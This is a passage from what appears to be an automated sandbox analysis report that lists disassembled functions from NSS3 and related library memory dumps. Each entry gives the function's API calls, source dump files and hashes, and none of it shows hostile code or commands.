                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CBB4DE1
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CBB4DFF
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBB4E59
                                                                                            • Part of subcall function 6CB9FAB0: free.MOZGLUE(?,-00000001,?,?,6CB3F673,00000000,00000000), ref: 6CB9FAC7
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC7300C,00000000), ref: 6CBB4EB8
                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6CBB4EFF
                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CBB4F56
                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBB521A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                          • String ID:
                                                                                          • API String ID: 1025791883-0
                                                                                          • Opcode ID: 0e86f46321a66987dc343cdaea9f57fdb4f686a3bec5d7da31e84404ce9603a2
                                                                                          • Instruction ID: af7eeb7df98d645bb626d779ab89b3f0b0da9ef845840d5aebaf711bdce289bd
                                                                                          • Opcode Fuzzy Hash: 0e86f46321a66987dc343cdaea9f57fdb4f686a3bec5d7da31e84404ce9603a2
                                                                                          • Instruction Fuzzy Hash: 26F17A71E00249CBDB08CF54D8407AEB7B2FF48358F254129E915AB780EB35E986CF92
                                                                                          Function 6CA24480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$moz_xmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 3009372454-0
                                                                                          • Opcode ID: 07941f5633c9850cf684a2c8764409ccc007bcdf2529ee946d1e421100239638
                                                                                          • Instruction ID: b81233be0eae5ae34be01b29d12dab59a9fbd0cf793f92fdc60faf7a77e3484b
                                                                                          • Opcode Fuzzy Hash: 07941f5633c9850cf684a2c8764409ccc007bcdf2529ee946d1e421100239638
                                                                                          • Instruction Fuzzy Hash: 19B1E271A005208FDB18CF3CD99476D76B2EF42328F1C4669E866DBB96D738D8C48B81
                                                                                          Function 6CBCCFA0 Relevance: 16.7, APIs: 11, Instructions: 212threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CBD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBD5B56
                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6CBCCFFC
                                                                                            • Part of subcall function 6CC09090: TlsGetValue.KERNEL32 ref: 6CC090AB
                                                                                            • Part of subcall function 6CC09090: TlsGetValue.KERNEL32 ref: 6CC090C9
                                                                                            • Part of subcall function 6CC09090: EnterCriticalSection.KERNEL32 ref: 6CC090E5
                                                                                            • Part of subcall function 6CC09090: TlsGetValue.KERNEL32 ref: 6CC09116
                                                                                            • Part of subcall function 6CC09090: LeaveCriticalSection.KERNEL32 ref: 6CC0913F
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CBCD011
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBCD08E
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CBCD109
                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6CBCD182
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBCD1B9
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CBCD1D8
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBCD1EC
                                                                                          • PR_GetCurrentThread.NSS3 ref: 6CBCD224
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBCD245
                                                                                          • PR_SetError.NSS3(FFFFD036,00000000), ref: 6CBCD270
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Monitor$CurrentEnterErrorExitThreadValue$CriticalSection$IdentitiesLayerLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3829233501-0
                                                                                          • Opcode ID: 4db99babac40eae4b257ff9dd43857da350905c7c30bc5925df05aa9cedd3463
                                                                                          • Instruction ID: 7a9031d90aeef3b7da58e895879a59c05ddc9fde3f7deb0303414a4427e1b318
                                                                                          • Opcode Fuzzy Hash: 4db99babac40eae4b257ff9dd43857da350905c7c30bc5925df05aa9cedd3463
                                                                                          • Instruction Fuzzy Hash: D871E6B8B842D49BEB109F34EC947DA37B4EF0131DF180179ED055AA92E332D994C6A3
                                                                                          Function 6CBB0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(6CBB2C2A), ref: 6CBB0C81
                                                                                            • Part of subcall function 6CB9BE30: SECOID_FindOID_Util.NSS3(6CB5311B,00000000,?,6CB5311B,?), ref: 6CB9BE44
                                                                                            • Part of subcall function 6CB88500: SECOID_GetAlgorithmTag_Util.NSS3(6CB895DC,00000000,00000000,00000000,?,6CB895DC,00000000,00000000,?,6CB67F4A,00000000,?,00000000,00000000), ref: 6CB88517
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBB0CC4
                                                                                            • Part of subcall function 6CB9FAB0: free.MOZGLUE(?,-00000001,?,?,6CB3F673,00000000,00000000), ref: 6CB9FAC7
                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBB0CD5
                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CBB0D1D
                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CBB0D3B
                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CBB0D7D
                                                                                          • free.MOZGLUE(00000000), ref: 6CBB0DB5
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBB0DC1
                                                                                          • free.MOZGLUE(00000000), ref: 6CBB0DF7
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBB0E05
                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBB0E0F
                                                                                            • Part of subcall function 6CB895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CB67F4A,00000000,?,00000000,00000000), ref: 6CB895E0
                                                                                            • Part of subcall function 6CB895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CB67F4A,00000000,?,00000000,00000000), ref: 6CB895F5
                                                                                            • Part of subcall function 6CB895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CB89609
                                                                                            • Part of subcall function 6CB895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB8961D
                                                                                            • Part of subcall function 6CB895C0: PK11_GetInternalSlot.NSS3 ref: 6CB8970B
                                                                                            • Part of subcall function 6CB895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB89756
                                                                                            • Part of subcall function 6CB895C0: PK11_GetIVLength.NSS3(?), ref: 6CB89767
                                                                                            • Part of subcall function 6CB895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CB8977E
                                                                                            • Part of subcall function 6CB895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB8978E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                          • String ID:
                                                                                          • API String ID: 3136566230-0
                                                                                          • Opcode ID: e8886cbe2aaf019be4643ee0cda20fe6f41cccaa2e9043bae18b8e9c4215495e
                                                                                          • Instruction ID: b1510003dd4d3fb6f618ec029c5d6998d1a74c0976734fbebb30014768facde8
                                                                                          • Opcode Fuzzy Hash: e8886cbe2aaf019be4643ee0cda20fe6f41cccaa2e9043bae18b8e9c4215495e
                                                                                          • Instruction Fuzzy Hash: D941CEF1901296ABEB009F65ED41BBF7674EF01358F100028ED1567B81EB35EA58CBE2
                                                                                          Function 6CB44FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_NewLock.NSS3(00000001,00000000,6CC90148,?,6CB56FEC), ref: 6CB4502A
                                                                                          • PR_NewLock.NSS3(00000001,00000000,6CC90148,?,6CB56FEC), ref: 6CB45034
                                                                                          • PL_NewHashTable.NSS3(00000000,6CB9FE80,6CB9FD30,6CBEC350,00000000,00000000,00000001,00000000,6CC90148,?,6CB56FEC), ref: 6CB45055
                                                                                          • PL_NewHashTable.NSS3(00000000,6CB9FE80,6CB9FD30,6CBEC350,00000000,00000000,?,00000001,00000000,6CC90148,?,6CB56FEC), ref: 6CB4506D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: HashLockTable
                                                                                          • String ID:
                                                                                          • API String ID: 3862423791-0
                                                                                          • Opcode ID: 5ced6e301a7e47df4d66ff365ed17cfec166f458016a958f8ff37b12fecdd139
                                                                                          • Instruction ID: 15b96ba65a6d0462a62c1f11595ebd36ee591e25341ac14f37d258ce163b05fc
                                                                                          • Opcode Fuzzy Hash: 5ced6e301a7e47df4d66ff365ed17cfec166f458016a958f8ff37b12fecdd139
                                                                                          • Instruction Fuzzy Hash: B231D371B096709BDB108AA6A85CB5FB77CDB13718F018125EA09C3B04E3749C48EBD6
                                                                                          Function 6CAE2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CAE2F3D
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CAE2FB9
                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6CAE3005
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CAE30EE
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CAE3131
                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAE3178
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                          • API String ID: 984749767-598938438
                                                                                          • Opcode ID: a4aa5b55e7a5245ff709c7731b9615704ed580b6b28fe97425f69bc0151d7298
                                                                                          • Instruction ID: 4e0f6349c8c397bc197577213d6a63b87291a4c673f74cbedc4e8aba2790dc1f
                                                                                          • Opcode Fuzzy Hash: a4aa5b55e7a5245ff709c7731b9615704ed580b6b28fe97425f69bc0151d7298
                                                                                          • Instruction Fuzzy Hash: 1CB19D70E062159BCF08CF9DC884AAEBBB1BF4C304F24406DE855A7B51E7749991DBA4
                                                                                          Function 6CB76C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_DigestInit), ref: 6CB76C66
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB76C94
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB76CA3
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB76CB9
                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB76CD5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                          • API String ID: 1003633598-3690128261
                                                                                          • Opcode ID: 583244ee5ecc53bb3fe2cd2b5acfa239d3a73bfe3163b79051b0341841800c8a
                                                                                          • Instruction ID: 97a830e26edf9b2a3eca6e519430ad332de76eb5308f6d83d0939c838e604319
                                                                                          • Opcode Fuzzy Hash: 583244ee5ecc53bb3fe2cd2b5acfa239d3a73bfe3163b79051b0341841800c8a
                                                                                          • Instruction Fuzzy Hash: 442106317001A49BDB109BA6AE9CF9E37B5EB4231DF444025ED1ED7B01EB309859CBA6
                                                                                          Function 6CB40F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB40F62
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB40F84
                                                                                            • Part of subcall function 6CB9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC718D0,?), ref: 6CB9B095
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,6CB5F59B,6CC6890C,?), ref: 6CB40FA8
                                                                                          • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6CB40FC1
                                                                                            • Part of subcall function 6CBA0BE0: malloc.MOZGLUE(6CB98D2D,?,00000000,?), ref: 6CBA0BF8
                                                                                            • Part of subcall function 6CBA0BE0: TlsGetValue.KERNEL32(6CB98D2D,?,00000000,?), ref: 6CBA0C15
                                                                                          • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6CB40FDB
                                                                                          • PR_CallOnce.NSS3(6CCA2AA4,6CBA12D0), ref: 6CB40FEF
                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6CB41001
                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6CB41009
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                          • String ID: security
                                                                                          • API String ID: 2061345354-3315324353
                                                                                          • Opcode ID: 80c25370ed00b26c04cb7b74278c32faf82bcdb4bcfae6f2e8de19dc1cf69647
                                                                                          • Instruction ID: ea7b1730f3847423d4f2bcf6667a41db380aa2fe11fa3cb15dbf5616065899ec
                                                                                          • Opcode Fuzzy Hash: 80c25370ed00b26c04cb7b74278c32faf82bcdb4bcfae6f2e8de19dc1cf69647
                                                                                          • Instruction Fuzzy Hash: 8A2136B1908284ABE7109F24EC40AAF7BB8EF5565CF048428FC5897701F731E95ACBD2
                                                                                          Function 6CB46DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6CB47D8F,6CB47D8F,?,?), ref: 6CB46DC8
                                                                                            • Part of subcall function 6CB9FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CB9FE08
                                                                                            • Part of subcall function 6CB9FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CB9FE1D
                                                                                            • Part of subcall function 6CB9FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CB9FE62
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CB47D8F,?,?), ref: 6CB46DD5
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC68FA0,00000000,?,?,?,?,6CB47D8F,?,?), ref: 6CB46DF7
                                                                                            • Part of subcall function 6CB9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC718D0,?), ref: 6CB9B095
                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB46E35
                                                                                            • Part of subcall function 6CB9FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CB9FE29
                                                                                            • Part of subcall function 6CB9FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CB9FE3D
                                                                                            • Part of subcall function 6CB9FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CB9FE6F
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB46E4C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA116E
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC68FE0,00000000), ref: 6CB46E82
                                                                                            • Part of subcall function 6CB46AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CB4B21D,00000000,00000000,6CB4B219,?,6CB46BFB,00000000,?,00000000,00000000,?,?,?,6CB4B21D), ref: 6CB46B01
                                                                                            • Part of subcall function 6CB46AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CB46B8A
                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB46F1E
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB46F35
                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC68FE0,00000000), ref: 6CB46F6B
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6CB47D8F,?,?), ref: 6CB46FE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                          • String ID:
                                                                                          • API String ID: 587344769-0
                                                                                          • Opcode ID: e89fed215984d82222a1d6eefba13431526ab5366f7e2eca00c7e4854db73add
                                                                                          • Instruction ID: e2efb5d0fbda5374f05f8e491e7d311ed9837d5fc75d199db28523b46476192b
                                                                                          • Opcode Fuzzy Hash: e89fed215984d82222a1d6eefba13431526ab5366f7e2eca00c7e4854db73add
                                                                                          • Instruction Fuzzy Hash: 9971B271D14286AFDB00CF15CD40BAABBA8FF95308F15822AE848D7B11F770E994DB91
                                                                                          Function 6CB80FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB81057
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB81085
                                                                                          • PK11_GetAllTokens.NSS3 ref: 6CB810B1
                                                                                          • free.MOZGLUE(?), ref: 6CB81107
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB81172
                                                                                          • free.MOZGLUE(?), ref: 6CB81182
                                                                                          • free.MOZGLUE(?), ref: 6CB811A6
                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CB811C5
                                                                                            • Part of subcall function 6CB852C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6CB5EAC5,00000001), ref: 6CB852DF
                                                                                            • Part of subcall function 6CB852C0: EnterCriticalSection.KERNEL32(?), ref: 6CB852F3
                                                                                            • Part of subcall function 6CB852C0: PR_Unlock.NSS3(?), ref: 6CB85358
                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CB811D3
                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CB811F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
